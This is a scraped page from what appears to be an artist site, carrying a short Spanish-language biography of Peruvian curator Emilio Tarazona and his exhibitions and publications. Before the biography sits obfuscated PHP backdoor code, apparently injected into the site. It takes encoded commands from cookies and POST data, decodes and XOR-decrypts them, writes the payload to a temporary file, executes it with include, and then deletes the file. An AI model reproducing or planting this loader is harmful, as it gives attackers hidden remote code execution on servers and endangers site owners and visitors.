$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Emilio Tarazona – www.interferencechannel.com

Emilio Tarazona

Emilio Tarazona (Ancash – Perú, 1975) es escritor, investigador y curador independiente. Ha sido Curador de las exposiciones: Frecuencia e Intensidad (2 décadas + 1 lustro) (Valenzuela Klenner Galería, Bogotá 2014), Cuerpo en disolvencia, flujos, secreciones, residuos. (Galería Pancho Fierro, Lima y Fundación Gilberto Alzate Avendaño, Bogotá 2013) Jorge Eielson. Premio Tecnoquímica 2004 (Icpna, 2005), Juan Javier Salazar: antes / durante / después. 1977-2006 (Galería Pancho Fierro, 2006). Co-curador de: La persistencia de lo efímero. Orígenes del no-objetualismo en el Perú: ambientaciones / happenings / arte conceptual (1965 – 1975), (Centro Cultural de España Lima, 2007),Subversive Practices. Art under Conditions of Political Repression. 60s-80s / South America / Europe; y Die Chronologie der Teresa Burga. Berichte, Diagramme, Intervalle / 29.09.11 (ambas en W-Kunstverein Stuttgart, 2009 y 2011). Ha publicado La poética visual de Jorge Eielson (autoeditado, 2004) yAccionismo en el Perú. Rastros y fuentes para una primera cronología (ICPNA, 2006).♦

Comments are closed.